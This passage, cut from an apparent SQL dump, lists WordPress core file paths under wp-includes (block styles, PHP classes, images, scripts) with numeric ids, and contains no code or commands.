wp-includes/blocks/site-logo/editor.css'),(4755,'wp-includes/blocks/site-logo/editor.min.css'),(4756,'wp-includes/blocks/site-logo/style-rtl.css'),(4757,'wp-includes/blocks/site-logo/style-rtl.min.css'),(4758,'wp-includes/blocks/site-logo/style.css'),(4759,'wp-includes/blocks/site-logo/style.min.css'),(4760,'wp-includes/blocks/site-logo.php'),(4761,'wp-includes/blocks/site-tagline/block.json'),(4762,'wp-includes/blocks/site-tagline/editor-rtl.css'),(4763,'wp-includes/blocks/site-tagline/editor-rtl.min.css'),(4764,'wp-includes/blocks/site-tagline/editor.css'),(4765,'wp-includes/blocks/site-tagline/editor.min.css'),(4766,'wp-includes/blocks/site-tagline.php'),(4767,'wp-includes/blocks/site-title/block.json'),(4768,'wp-includes/blocks/site-title/editor-rtl.css'),(4769,'wp-includes/blocks/site-title/editor-rtl.min.css'),(4770,'wp-includes/blocks/site-title/editor.css'),(4771,'wp-includes/blocks/site-title/editor.min.css'),(4772,'wp-includes/blocks/site-title.php'),(4773,'wp-includes/blocks/social-link/block.json'),(4774,'wp-includes/blocks/social-link/editor-rtl.css'),(4775,'wp-includes/blocks/social-link/editor-rtl.min.css'),(4776,'wp-includes/blocks/social-link/editor.css'),(4777,'wp-includes/blocks/social-link/editor.min.css'),(4778,'wp-includes/blocks/social-link.php'),(4779,'wp-includes/blocks/social-links/block.json'),(4780,'wp-includes/blocks/social-links/editor-rtl.css'),(4781,'wp-includes/blocks/social-links/editor-rtl.min.css'),(4782,'wp-includes/blocks/social-links/editor.css'),(4783,'wp-includes/blocks/social-links/editor.min.css'),(4784,'wp-includes/blocks/social-links/style-rtl.css'),(4785,'wp-includes/blocks/social-links/style-rtl.min.css'),(4786,'wp-includes/blocks/social-links/style.css'),(4787,'wp-includes/blocks/social-links/style.min.css'),(4788,'wp-includes/blocks/spacer/block.json'),(4789,'wp-includes/blocks/spacer/editor-rtl.css'),(4790,'wp-includes/blocks/spacer/editor-rtl.min.css'),(4791,'wp-includes/blocks/spacer/editor.css'),(4792,'wp-includes/blocks/spacer/editor.min.css'),(4793,'wp-includes/blocks/spacer/style-rtl.css'),(4794,'wp-includes/blocks/spacer/style-rtl.min.css'),(4795,'wp-includes/blocks/spacer/style.css'),(4796,'wp-includes/blocks/spacer/style.min.css'),(4797,'wp-includes/blocks/table/block.json'),(4798,'wp-includes/blocks/table/editor-rtl.css'),(4799,'wp-includes/blocks/table/editor-rtl.min.css'),(4800,'wp-includes/blocks/table/editor.css'),(4801,'wp-includes/blocks/table/editor.min.css'),(4802,'wp-includes/blocks/table/style-rtl.css'),(4803,'wp-includes/blocks/table/style-rtl.min.css'),(4804,'wp-includes/blocks/table/style.css'),(4805,'wp-includes/blocks/table/style.min.css'),(4806,'wp-includes/blocks/table/theme-rtl.css'),(4807,'wp-includes/blocks/table/theme-rtl.min.css'),(4808,'wp-includes/blocks/table/theme.css'),(4809,'wp-includes/blocks/table/theme.min.css'),(4810,'wp-includes/blocks/tag-cloud/block.json'),(4811,'wp-includes/blocks/tag-cloud/style-rtl.css'),(4812,'wp-includes/blocks/tag-cloud/style-rtl.min.css'),(4813,'wp-includes/blocks/tag-cloud/style.css'),(4814,'wp-includes/blocks/tag-cloud/style.min.css'),(4815,'wp-includes/blocks/tag-cloud.php'),(4816,'wp-includes/blocks/template-part/block.json'),(4817,'wp-includes/blocks/template-part/editor-rtl.css'),(4818,'wp-includes/blocks/template-part/editor-rtl.min.css'),(4819,'wp-includes/blocks/template-part/editor.css'),(4820,'wp-includes/blocks/template-part/editor.min.css'),(4821,'wp-includes/blocks/template-part/theme-rtl.css'),(4822,'wp-includes/blocks/template-part/theme-rtl.min.css'),(4823,'wp-includes/blocks/template-part/theme.css'),(4824,'wp-includes/blocks/template-part/theme.min.css'),(4825,'wp-includes/blocks/template-part.php'),(4826,'wp-includes/blocks/term-description/block.json'),(4827,'wp-includes/blocks/term-description.php'),(4828,'wp-includes/blocks/text-columns/block.json'),(4829,'wp-includes/blocks/text-columns/editor-rtl.css'),(4830,'wp-includes/blocks/text-columns/editor-rtl.min.css'),(4831,'wp-includes/blocks/text-columns/editor.css'),(4832,'wp-includes/blocks/text-columns/editor.min.css'),(4833,'wp-includes/blocks/text-columns/style-rtl.css'),(4834,'wp-includes/blocks/text-columns/style-rtl.min.css'),(4835,'wp-includes/blocks/text-columns/style.css'),(4836,'wp-includes/blocks/text-columns/style.min.css'),(4837,'wp-includes/blocks/verse/block.json'),(4838,'wp-includes/blocks/verse/style-rtl.css'),(4839,'wp-includes/blocks/verse/style-rtl.min.css'),(4840,'wp-includes/blocks/verse/style.css'),(4841,'wp-includes/blocks/verse/style.min.css'),(4842,'wp-includes/blocks/video/block.json'),(4843,'wp-includes/blocks/video/editor-rtl.css'),(4844,'wp-includes/blocks/video/editor-rtl.min.css'),(4845,'wp-includes/blocks/video/editor.css'),(4846,'wp-includes/blocks/video/editor.min.css'),(4847,'wp-includes/blocks/video/style-rtl.css'),(4848,'wp-includes/blocks/video/style-rtl.min.css'),(4849,'wp-includes/blocks/video/style.css'),(4850,'wp-includes/blocks/video/style.min.css'),(4851,'wp-includes/blocks/video/theme-rtl.css'),(4852,'wp-includes/blocks/video/theme-rtl.min.css'),(4853,'wp-includes/blocks/video/theme.css'),(4854,'wp-includes/blocks/video/theme.min.css'),(4855,'wp-includes/blocks/widget-group/block.json'),(4856,'wp-includes/blocks/widget-group.php'),(4857,'wp-includes/blocks.php'),(4858,'wp-includes/bookmark-template.php'),(4859,'wp-includes/bookmark.php'),(4860,'wp-includes/cache-compat.php'),(4861,'wp-includes/cache.php'),(4862,'wp-includes/canonical.php'),(4863,'wp-includes/capabilities.php'),(4864,'wp-includes/category-template.php'),(4865,'wp-includes/category.php'),(4866,'wp-includes/certificates/ca-bundle.crt'),(4867,'wp-includes/class-IXR.php'),(4868,'wp-includes/class-feed.php'),(4869,'wp-includes/class-http.php'),(4870,'wp-includes/class-json.php'),(4871,'wp-includes/class-oembed.php'),(4872,'wp-includes/class-phpass.php'),(4873,'wp-includes/class-phpmailer.php'),(4874,'wp-includes/class-pop3.php'),(4875,'wp-includes/class-requests.php'),(4876,'wp-includes/class-simplepie.php'),(4877,'wp-includes/class-smtp.php'),(4878,'wp-includes/class-snoopy.php'),(4879,'wp-includes/class-walker-category-dropdown.php'),(4880,'wp-includes/class-walker-category.php'),(4881,'wp-includes/class-walker-comment.php'),(4882,'wp-includes/class-walker-nav-menu.php'),(4883,'wp-includes/class-walker-page-dropdown.php'),(4884,'wp-includes/class-walker-page.php'),(4885,'wp-includes/class-wp-admin-bar.php'),(4886,'wp-includes/class-wp-ajax-response.php'),(4887,'wp-includes/class-wp-application-passwords.php'),(4888,'wp-includes/class-wp-block-editor-context.php'),(4889,'wp-includes/class-wp-block-list.php'),(4890,'wp-includes/class-wp-block-parser.php'),(4891,'wp-includes/class-wp-block-pattern-categories-registry.php'),(4892,'wp-includes/class-wp-block-patterns-registry.php'),(4893,'wp-includes/class-wp-block-styles-registry.php'),(4894,'wp-includes/class-wp-block-supports.php'),(4895,'wp-includes/class-wp-block-template.php'),(4896,'wp-includes/class-wp-block-type-registry.php'),(4897,'wp-includes/class-wp-block-type.php'),(4898,'wp-includes/class-wp-block.php'),(4899,'wp-includes/class-wp-comment-query.php'),(4900,'wp-includes/class-wp-comment.php'),(4901,'wp-includes/class-wp-customize-control.php'),(4902,'wp-includes/class-wp-customize-manager.php'),(4903,'wp-includes/class-wp-customize-nav-menus.php'),(4904,'wp-includes/class-wp-customize-panel.php'),(4905,'wp-includes/class-wp-customize-section.php'),(4906,'wp-includes/class-wp-customize-setting.php'),(4907,'wp-includes/class-wp-customize-widgets.php'),(4908,'wp-includes/class-wp-date-query.php'),(4909,'wp-includes/class-wp-dependencies.php'),(4910,'wp-includes/class-wp-dependency.php'),(4911,'wp-includes/class-wp-editor.php'),(4912,'wp-includes/class-wp-embed.php'),(4913,'wp-includes/class-wp-error.php'),(4914,'wp-includes/class-wp-fatal-error-handler.php'),(4915,'wp-includes/class-wp-feed-cache-transient.php'),(4916,'wp-includes/class-wp-feed-cache.php'),(4917,'wp-includes/class-wp-hook.php'),(4918,'wp-includes/class-wp-http-cookie.php'),(4919,'wp-includes/class-wp-http-curl.php'),(4920,'wp-includes/class-wp-http-encoding.php'),(4921,'wp-includes/class-wp-http-ixr-client.php'),(4922,'wp-includes/class-wp-http-proxy.php'),(4923,'wp-includes/class-wp-http-requests-hooks.php'),(4924,'wp-includes/class-wp-http-requests-response.php'),(4925,'wp-includes/class-wp-http-response.php'),(4926,'wp-includes/class-wp-http-streams.php'),(4927,'wp-includes/class-wp-http.php'),(4928,'wp-includes/class-wp-image-editor-gd.php'),(4929,'wp-includes/class-wp-image-editor-imagick.php'),(4930,'wp-includes/class-wp-image-editor.php'),(4931,'wp-includes/class-wp-list-util.php'),(4932,'wp-includes/class-wp-locale-switcher.php'),(4933,'wp-includes/class-wp-locale.php'),(4934,'wp-includes/class-wp-matchesmapregex.php'),(4935,'wp-includes/class-wp-meta-query.php'),(4936,'wp-includes/class-wp-metadata-lazyloader.php'),(4937,'wp-includes/class-wp-network-query.php'),(4938,'wp-includes/class-wp-network.php'),(4939,'wp-includes/class-wp-object-cache.php'),(4940,'wp-includes/class-wp-oembed-controller.php'),(4941,'wp-includes/class-wp-oembed.php'),(4942,'wp-includes/class-wp-paused-extensions-storage.php'),(4943,'wp-includes/class-wp-post-type.php'),(4944,'wp-includes/class-wp-post.php'),(4945,'wp-includes/class-wp-query.php'),(4946,'wp-includes/class-wp-recovery-mode-cookie-service.php'),(4947,'wp-includes/class-wp-recovery-mode-email-service.php'),(4948,'wp-includes/class-wp-recovery-mode-key-service.php'),(4949,'wp-includes/class-wp-recovery-mode-link-service.php'),(4950,'wp-includes/class-wp-recovery-mode.php'),(4951,'wp-includes/class-wp-rewrite.php'),(4952,'wp-includes/class-wp-role.php'),(4953,'wp-includes/class-wp-roles.php'),(4954,'wp-includes/class-wp-scripts.php'),(4955,'wp-includes/class-wp-session-tokens.php'),(4956,'wp-includes/class-wp-simplepie-file.php'),(4957,'wp-includes/class-wp-simplepie-sanitize-kses.php'),(4958,'wp-includes/class-wp-site-query.php'),(4959,'wp-includes/class-wp-site.php'),(4960,'wp-includes/class-wp-styles.php'),(4961,'wp-includes/class-wp-tax-query.php'),(4962,'wp-includes/class-wp-taxonomy.php'),(4963,'wp-includes/class-wp-term-query.php'),(4964,'wp-includes/class-wp-term.php'),(4965,'wp-includes/class-wp-text-diff-renderer-inline.php'),(4966,'wp-includes/class-wp-text-diff-renderer-table.php'),(4967,'wp-includes/class-wp-textdomain-registry.php'),(4968,'wp-includes/class-wp-theme-json-data.php'),(4969,'wp-includes/class-wp-theme-json-resolver.php'),(4970,'wp-includes/class-wp-theme-json-schema.php'),(4971,'wp-includes/class-wp-theme-json.php'),(4972,'wp-includes/class-wp-theme.php'),(4973,'wp-includes/class-wp-user-meta-session-tokens.php'),(4974,'wp-includes/class-wp-user-query.php'),(4975,'wp-includes/class-wp-user-request.php'),(4976,'wp-includes/class-wp-user.php'),(4977,'wp-includes/class-wp-walker.php'),(4978,'wp-includes/class-wp-widget-factory.php'),(4979,'wp-includes/class-wp-widget.php'),(4980,'wp-includes/class-wp-xmlrpc-server.php'),(4981,'wp-includes/class-wp.php'),(4982,'wp-includes/class-wpdb.php'),(4983,'wp-includes/class.wp-dependencies.php'),(4984,'wp-includes/class.wp-scripts.php'),(4985,'wp-includes/class.wp-styles.php'),(4986,'wp-includes/comment-template.php'),(4987,'wp-includes/comment.php'),(4988,'wp-includes/compat.php'),(4989,'wp-includes/cron.php'),(4990,'wp-includes/css/admin-bar-rtl.css'),(4991,'wp-includes/css/admin-bar-rtl.min.css'),(4992,'wp-includes/css/admin-bar.css'),(4993,'wp-includes/css/admin-bar.min.css'),(4994,'wp-includes/css/buttons-rtl.css'),(4995,'wp-includes/css/buttons-rtl.min.css'),(4996,'wp-includes/css/buttons.css'),(4997,'wp-includes/css/buttons.min.css'),(4998,'wp-includes/css/classic-themes.css'),(4999,'wp-includes/css/classic-themes.min.css'),(5000,'wp-includes/css/customize-preview-rtl.css'),(5001,'wp-includes/css/customize-preview-rtl.min.css'),(5002,'wp-includes/css/customize-preview.css'),(5003,'wp-includes/css/customize-preview.min.css'),(5004,'wp-includes/css/dashicons.css'),(5005,'wp-includes/css/dashicons.min.css'),(5006,'wp-includes/css/dist/block-directory/style-rtl.css'),(5007,'wp-includes/css/dist/block-directory/style-rtl.min.css'),(5008,'wp-includes/css/dist/block-directory/style.css'),(5009,'wp-includes/css/dist/block-directory/style.min.css'),(5010,'wp-includes/css/dist/block-editor/default-editor-styles-rtl.css'),(5011,'wp-includes/css/dist/block-editor/default-editor-styles-rtl.min.css'),(5012,'wp-includes/css/dist/block-editor/default-editor-styles.css'),(5013,'wp-includes/css/dist/block-editor/default-editor-styles.min.css'),(5014,'wp-includes/css/dist/block-editor/style-rtl.css'),(5015,'wp-includes/css/dist/block-editor/style-rtl.min.css'),(5016,'wp-includes/css/dist/block-editor/style.css'),(5017,'wp-includes/css/dist/block-editor/style.min.css'),(5018,'wp-includes/css/dist/block-library/classic-rtl.css'),(5019,'wp-includes/css/dist/block-library/classic-rtl.min.css'),(5020,'wp-includes/css/dist/block-library/classic.css'),(5021,'wp-includes/css/dist/block-library/classic.min.css'),(5022,'wp-includes/css/dist/block-library/common-rtl.css'),(5023,'wp-includes/css/dist/block-library/common-rtl.min.css'),(5024,'wp-includes/css/dist/block-library/common.css'),(5025,'wp-includes/css/dist/block-library/common.min.css'),(5026,'wp-includes/css/dist/block-library/editor-elements-rtl.css'),(5027,'wp-includes/css/dist/block-library/editor-elements-rtl.min.css'),(5028,'wp-includes/css/dist/block-library/editor-elements.css'),(5029,'wp-includes/css/dist/block-library/editor-elements.min.css'),(5030,'wp-includes/css/dist/block-library/editor-rtl.css'),(5031,'wp-includes/css/dist/block-library/editor-rtl.min.css'),(5032,'wp-includes/css/dist/block-library/editor.css'),(5033,'wp-includes/css/dist/block-library/editor.min.css'),(5034,'wp-includes/css/dist/block-library/elements-rtl.css'),(5035,'wp-includes/css/dist/block-library/elements-rtl.min.css'),(5036,'wp-includes/css/dist/block-library/elements.css'),(5037,'wp-includes/css/dist/block-library/elements.min.css'),(5038,'wp-includes/css/dist/block-library/reset-rtl.css'),(5039,'wp-includes/css/dist/block-library/reset-rtl.min.css'),(5040,'wp-includes/css/dist/block-library/reset.css'),(5041,'wp-includes/css/dist/block-library/reset.min.css'),(5042,'wp-includes/css/dist/block-library/style-rtl.css'),(5043,'wp-includes/css/dist/block-library/style-rtl.min.css'),(5044,'wp-includes/css/dist/block-library/style.css'),(5045,'wp-includes/css/dist/block-library/style.min.css'),(5046,'wp-includes/css/dist/block-library/theme-rtl.css'),(5047,'wp-includes/css/dist/block-library/theme-rtl.min.css'),(5048,'wp-includes/css/dist/block-library/theme.css'),(5049,'wp-includes/css/dist/block-library/theme.min.css'),(5050,'wp-includes/css/dist/components/style-rtl.css'),(5051,'wp-includes/css/dist/components/style-rtl.min.css'),(5052,'wp-includes/css/dist/components/style.css'),(5053,'wp-includes/css/dist/components/style.min.css'),(5054,'wp-includes/css/dist/customize-widgets/style-rtl.css'),(5055,'wp-includes/css/dist/customize-widgets/style-rtl.min.css'),(5056,'wp-includes/css/dist/customize-widgets/style.css'),(5057,'wp-includes/css/dist/customize-widgets/style.min.css'),(5058,'wp-includes/css/dist/edit-post/classic-rtl.css'),(5059,'wp-includes/css/dist/edit-post/classic-rtl.min.css'),(5060,'wp-includes/css/dist/edit-post/classic.css'),(5061,'wp-includes/css/dist/edit-post/classic.min.css'),(5062,'wp-includes/css/dist/edit-post/style-rtl.css'),(5063,'wp-includes/css/dist/edit-post/style-rtl.min.css'),(5064,'wp-includes/css/dist/edit-post/style.css'),(5065,'wp-includes/css/dist/edit-post/style.min.css'),(5066,'wp-includes/css/dist/edit-site/style-rtl.css'),(5067,'wp-includes/css/dist/edit-site/style-rtl.min.css'),(5068,'wp-includes/css/dist/edit-site/style.css'),(5069,'wp-includes/css/dist/edit-site/style.min.css'),(5070,'wp-includes/css/dist/edit-widgets/style-rtl.css'),(5071,'wp-includes/css/dist/edit-widgets/style-rtl.min.css'),(5072,'wp-includes/css/dist/edit-widgets/style.css'),(5073,'wp-includes/css/dist/edit-widgets/style.min.css'),(5074,'wp-includes/css/dist/editor/style-rtl.css'),(5075,'wp-includes/css/dist/editor/style-rtl.min.css'),(5076,'wp-includes/css/dist/editor/style.css'),(5077,'wp-includes/css/dist/editor/style.min.css'),(5078,'wp-includes/css/dist/format-library/style-rtl.css'),(5079,'wp-includes/css/dist/format-library/style-rtl.min.css'),(5080,'wp-includes/css/dist/format-library/style.css'),(5081,'wp-includes/css/dist/format-library/style.min.css'),(5082,'wp-includes/css/dist/list-reusable-blocks/style-rtl.css'),(5083,'wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css'),(5084,'wp-includes/css/dist/list-reusable-blocks/style.css'),(5085,'wp-includes/css/dist/list-reusable-blocks/style.min.css'),(5086,'wp-includes/css/dist/nux/style-rtl.css'),(5087,'wp-includes/css/dist/nux/style-rtl.min.css'),(5088,'wp-includes/css/dist/nux/style.css'),(5089,'wp-includes/css/dist/nux/style.min.css'),(5090,'wp-includes/css/dist/reusable-blocks/style-rtl.css'),(5091,'wp-includes/css/dist/reusable-blocks/style-rtl.min.css'),(5092,'wp-includes/css/dist/reusable-blocks/style.css'),(5093,'wp-includes/css/dist/reusable-blocks/style.min.css'),(5094,'wp-includes/css/dist/widgets/style-rtl.css'),(5095,'wp-includes/css/dist/widgets/style-rtl.min.css'),(5096,'wp-includes/css/dist/widgets/style.css'),(5097,'wp-includes/css/dist/widgets/style.min.css'),(5098,'wp-includes/css/editor-rtl.css'),(5099,'wp-includes/css/editor-rtl.min.css'),(5100,'wp-includes/css/editor.css'),(5101,'wp-includes/css/editor.min.css'),(5102,'wp-includes/css/jquery-ui-dialog-rtl.css'),(5103,'wp-includes/css/jquery-ui-dialog-rtl.min.css'),(5104,'wp-includes/css/jquery-ui-dialog.css'),(5105,'wp-includes/css/jquery-ui-dialog.min.css'),(5106,'wp-includes/css/media-views-rtl.css'),(5107,'wp-includes/css/media-views-rtl.min.css'),(5108,'wp-includes/css/media-views.css'),(5109,'wp-includes/css/media-views.min.css'),(5110,'wp-includes/css/wp-auth-check-rtl.css'),(5111,'wp-includes/css/wp-auth-check-rtl.min.css'),(5112,'wp-includes/css/wp-auth-check.css'),(5113,'wp-includes/css/wp-auth-check.min.css'),(5114,'wp-includes/css/wp-embed-template-ie.css'),(5115,'wp-includes/css/wp-embed-template-ie.min.css'),(5116,'wp-includes/css/wp-embed-template.css'),(5117,'wp-includes/css/wp-embed-template.min.css'),(5118,'wp-includes/css/wp-pointer-rtl.css'),(5119,'wp-includes/css/wp-pointer-rtl.min.css'),(5120,'wp-includes/css/wp-pointer.css'),(5121,'wp-includes/css/wp-pointer.min.css'),(5122,'wp-includes/customize/class-wp-customize-background-image-control.php'),(5123,'wp-includes/customize/class-wp-customize-background-image-setting.php'),(5124,'wp-includes/customize/class-wp-customize-background-position-control.php'),(5125,'wp-includes/customize/class-wp-customize-code-editor-control.php'),(5126,'wp-includes/customize/class-wp-customize-color-control.php'),(5127,'wp-includes/customize/class-wp-customize-cropped-image-control.php'),(5128,'wp-includes/customize/class-wp-customize-custom-css-setting.php'),(5129,'wp-includes/customize/class-wp-customize-date-time-control.php'),(5130,'wp-includes/customize/class-wp-customize-filter-setting.php'),(5131,'wp-includes/customize/class-wp-customize-header-image-control.php'),(5132,'wp-includes/customize/class-wp-customize-header-image-setting.php'),(5133,'wp-includes/customize/class-wp-customize-image-control.php'),(5134,'wp-includes/customize/class-wp-customize-media-control.php'),(5135,'wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php'),(5136,'wp-includes/customize/class-wp-customize-nav-menu-control.php'),(5137,'wp-includes/customize/class-wp-customize-nav-menu-item-control.php'),(5138,'wp-includes/customize/class-wp-customize-nav-menu-item-setting.php'),(5139,'wp-includes/customize/class-wp-customize-nav-menu-location-control.php'),(5140,'wp-includes/customize/class-wp-customize-nav-menu-locations-control.php'),(5141,'wp-includes/customize/class-wp-customize-nav-menu-name-control.php'),(5142,'wp-includes/customize/class-wp-customize-nav-menu-section.php'),(5143,'wp-includes/customize/class-wp-customize-nav-menu-setting.php'),(5144,'wp-includes/customize/class-wp-customize-nav-menus-panel.php'),(5145,'wp-includes/customize/class-wp-customize-new-menu-control.php'),(5146,'wp-includes/customize/class-wp-customize-new-menu-section.php'),(5147,'wp-includes/customize/class-wp-customize-partial.php'),(5148,'wp-includes/customize/class-wp-customize-selective-refresh.php'),(5149,'wp-includes/customize/class-wp-customize-sidebar-section.php'),(5150,'wp-includes/customize/class-wp-customize-site-icon-control.php'),(5151,'wp-includes/customize/class-wp-customize-theme-control.php'),(5152,'wp-includes/customize/class-wp-customize-themes-panel.php'),(5153,'wp-includes/customize/class-wp-customize-themes-section.php'),(5154,'wp-includes/customize/class-wp-customize-upload-control.php'),(5155,'wp-includes/customize/class-wp-sidebar-block-editor-control.php'),(5156,'wp-includes/customize/class-wp-widget-area-customize-control.php'),(5157,'wp-includes/customize/class-wp-widget-form-customize-control.php'),(5158,'wp-includes/date.php'),(5159,'wp-includes/default-constants.php'),(5160,'wp-includes/default-filters.php'),(5161,'wp-includes/default-widgets.php'),(5162,'wp-includes/deprecated.php'),(5163,'wp-includes/embed-template.php'),(5164,'wp-includes/embed.php'),(5165,'wp-includes/error-protection.php'),(5166,'wp-includes/feed-atom-comments.php'),(5167,'wp-includes/feed-atom.php'),(5168,'wp-includes/feed-rdf.php'),(5169,'wp-includes/feed-rss.php'),(5170,'wp-includes/feed-rss2-comments.php'),(5171,'wp-includes/feed-rss2.php'),(5172,'wp-includes/feed.php'),(5173,'wp-includes/fonts/dashicons.eot'),(5174,'wp-includes/fonts/dashicons.svg'),(5175,'wp-includes/fonts/dashicons.ttf'),(5176,'wp-includes/fonts/dashicons.woff'),(5177,'wp-includes/fonts/dashicons.woff2'),(5178,'wp-includes/formatting.php'),(5179,'wp-includes/functions.php'),(5180,'wp-includes/functions.wp-scripts.php'),(5181,'wp-includes/functions.wp-styles.php'),(5182,'wp-includes/general-template.php'),(5183,'wp-includes/global-styles-and-settings.php'),(5184,'wp-includes/http.php'),(5185,'wp-includes/https-detection.php'),(5186,'wp-includes/https-migration.php'),(5187,'wp-includes/images/admin-bar-sprite-2x.png'),(5188,'wp-includes/images/admin-bar-sprite.png'),(5189,'wp-includes/images/arrow-pointer-blue-2x.png'),(5190,'wp-includes/images/arrow-pointer-blue.png'),(5191,'wp-includes/images/blank.gif'),(5192,'wp-includes/images/crystal/archive.png'),(5193,'wp-includes/images/crystal/audio.png'),(5194,'wp-includes/images/crystal/code.png'),(5195,'wp-includes/images/crystal/default.png'),(5196,'wp-includes/images/crystal/document.png'),(5197,'wp-includes/images/crystal/interactive.png'),(5198,'wp-includes/images/crystal/license.txt'),(5199,'wp-includes/images/crystal/spreadsheet.png'),(5200,'wp-includes/images/crystal/text.png'),(5201,'wp-includes/images/crystal/video.png'),(5202,'wp-includes/images/down_arrow-2x.gif'),(5203,'wp-includes/images/down_arrow.gif'),(5204,'wp-includes/images/icon-pointer-flag-2x.png'),(5205,'wp-includes/images/icon-pointer-flag.png'),(5206,'wp-includes/images/media/archive.png'),(5207,'wp-includes/images/media/audio.png'),(5208,'wp-includes/images/media/code.png'),(5209,'wp-includes/images/media/default.png'),(5210,'wp-includes/images/media/document.png'),(5211,'wp-includes/images/media/interactive.png'),(5212,'wp-includes/images/media/spreadsheet.png'),(5213,'wp-includes/images/media/text.png'),(5214,'wp-includes/images/media/video.png'),(5215,'wp-includes/images/rss-2x.png'),(5216,'wp-includes/images/rss.png'),(5217,'wp-includes/images/smilies/frownie.png'),(5218,'wp-includes/images/smilies/icon_arrow.gif'),(5219,'wp-includes/images/smilies/icon_biggrin.gif'),(5220,'wp-includes/images/smilies/icon_confused.gif'),(5221,'wp-includes/images/smilies/icon_cool.gif'),(5222,'wp-includes/images/smilies/icon_cry.gif'),(5223,'wp-includes/images/smilies/icon_eek.gif'),(5224,'wp-includes/images/smilies/icon_evil.gif'),(5225,'wp-includes/images/smilies/icon_exclaim.gif'),(5226,'wp-includes/images/smilies/icon_idea.gif'),(5227,'wp-includes/images/smilies/icon_lol.gif'),(5228,'wp-includes/images/smilies/icon_mad.gif'),(5229,'wp-includes/images/smilies/icon_mrgreen.gif'),(5230,'wp-includes/images/smilies/icon_neutral.gif'),(5231,'wp-includes/images/smilies/icon_question.gif'),(5232,'wp-includes/images/smilies/icon_razz.gif'),(5233,'wp-includes/images/smilies/icon_redface.gif'),(5234,'wp-includes/images/smilies/icon_rolleyes.gif'),(5235,'wp-includes/images/smilies/icon_sad.gif'),(5236,'wp-includes/images/smilies/icon_smile.gif'),(5237,'wp-includes/images/smilies/icon_surprised.gif'),(5238,'wp-includes/images/smilies/icon_twisted.gif'),(5239,'wp-includes/images/smilies/icon_wink.gif'),(5240,'wp-includes/images/smilies/mrgreen.png'),(5241,'wp-includes/images/smilies/rolleyes.png'),(5242,'wp-includes/images/smilies/simple-smile.png'),(5243,'wp-includes/images/spinner-2x.gif'),(5244,'wp-includes/images/spinner.gif'),(5245,'wp-includes/images/toggle-arrow-2x.png'),(5246,'wp-includes/images/toggle-arrow.png'),(5247,'wp-includes/images/uploader-icons-2x.png'),(5248,'wp-includes/images/uploader-icons.png'),(5249,'wp-includes/images/w-logo-blue-white-bg.png'),(5250,'wp-includes/images/w-logo-blue.png'),(5251,'wp-includes/images/wlw/wp-comments.png'),(5252,'wp-includes/images/wlw/wp-icon.png'),(5253,'wp-includes/images/wlw/wp-watermark.png'),(5254,'wp-includes/images/wpicons-2x.png'),(5255,'wp-includes/images/wpicons.png'),(5256,'wp-includes/images/wpspin-2x.gif'),(5257,'wp-includes/images/wpspin.gif'),(5258,'wp-includes/images/xit-2x.gif'),(5259,'wp-includes/images/xit.gif'),(5260,'wp-includes/js/admin-bar.js'),(5261,'wp-includes/js/admin-bar.min.js'),(5262,'wp-includes/js/api-request.js'),(5263,'wp-includes/js/api-request.min.js'),(5264,'wp-includes/js/autosave.js'),(5265,'wp-includes/js/autosave.min.js'),(5266,'wp-includes/js/backbone.js'),(5267,'wp-includes/js/backbone.min.js'),(5268,'wp-includes/js/clipboard.js'),(5269,'wp-includes/js/clipboard.min.js'),(5270,'wp-includes/js/codemirror/codemirror.min.css'),(5271,'wp-includes/js/codemirror/codemirror.min.js'),(5272,'wp-includes/js/codemirror/csslint.js'),(5273,'wp-includes/js/codemirror/esprima.js'),(5274,'wp-includes/js/codemirror/fakejshint.js'),(5275,'wp-includes/js/codemirror/htmlhint-kses.js'),(5276,'wp-includes/js/codemirror/htmlhint.js'),(5277,'wp-includes/js/codemirror/jsonlint.js'),(5278,'wp-includes/js/colorpicker.js'),(5279,'wp-includes/js/colorpicker.min.js'),(5280,'wp-includes/js/comment-reply.js'),(5281,'wp-includes/js/comment-reply.min.js'),(5282,'wp-includes/js/crop/cropper.css'),(5283,'wp-includes/js/crop/cropper.js'),(5284,'wp-includes/js/crop/marqueeHoriz.gif'),(5285,'wp-includes/js/crop/marqueeVert.gif'),(5286,'wp-includes/js/customize-base.js'),(5287,'wp-includes/js/customize-base.min.js'),(5288,'wp-includes/js/customize-loader.js'),(5289,'wp-includes/js/customize-loader.min.js'),(5290,'wp-includes/js/customize-models.js'),(5291,'wp-includes/js/customize-models.min.js'),(5292,'wp-includes/js/customize-preview-nav-menus.js'),(5293,'wp-includes/js/customize-preview-nav-menus.min.js'),(5294,'wp-includes/js/customize-preview-widgets.js'),(5295,'wp-includes/js/customize-preview-widgets.min.js'),(5296,'wp-includes/js/customize-preview.js'),(5297,'wp-includes/js/customize-preview.min.js'),(5298,'wp-includes/js/customize-selective-refresh.js'),(5299,'wp-includes/js/customize-selective-refresh.min.js'),(5300,'wp-includes/js/customize-views.js'),(5301,'wp-includes/js/customize-views.min.js'),(5302,'wp-includes/js/dist/a11y.js'),(5303,'wp-includes/js/dist/a11y.min.js'),(5304,'wp-includes/js/dist/annotations.js'),(5305,'wp-includes/js/dist/annotations.min.js'),(5306,'wp-includes/js/dist/api-fetch.js'),(5307,'wp-includes/js/dist/api-fetch.min.js'),(5308,'wp-includes/js/dist/autop.js'),(5309,'wp-includes/js/dist/autop.min.js'),(5310,'wp-includes/js/dist/blob.js'),(5311,'wp-includes/js/dist/blob.min.js'),(5312,'wp-includes/js/dist/block-directory.js'),(5313,'wp-includes/js/dist/block-directory.min.js'),(5314,'wp-includes/js/dist/block-editor.js'),(5315,'wp-includes/js/dist/block-editor.min.js'),(5316,'wp-includes/js/dist/block-library.js'),(5317,'wp-includes/js/dist/block-library.min.js'),(5318,'wp-includes/js/dist/block-serialization-default-parser.js'),(5319,'wp-includes/js/dist/block-serialization-default-parser.min.js'),(5320,'wp-includes/js/dist/blocks.js'),(5321,'wp-includes/js/dist/blocks.min.js'),(5322,'wp-includes/js/dist/components.js'),(5323,'wp-includes/js/dist/components.min.js'),(5324,'wp-includes/js/dist/compose.js'),(5325,'wp-includes/js/dist/compose.min.js'),(5326,'wp-includes/js/dist/core-data.js'),(5327,'wp-includes/js/dist/core-data.min.js'),(5328,'wp-includes/js/dist/customize-widgets.js'),(5329,'wp-includes/js/dist/customize-widgets.min.js'),(5330,'wp-includes/js/dist/data-controls.js'),(5331,'wp-includes/js/dist/data-controls.min.js'),(5332,'wp-includes/js/dist/data.js'),(5333,'wp-includes/js/dist/data.min.js'),(5334,'wp-includes/js/dist/date.js'),(5335,'wp-includes/js/dist/date.min.j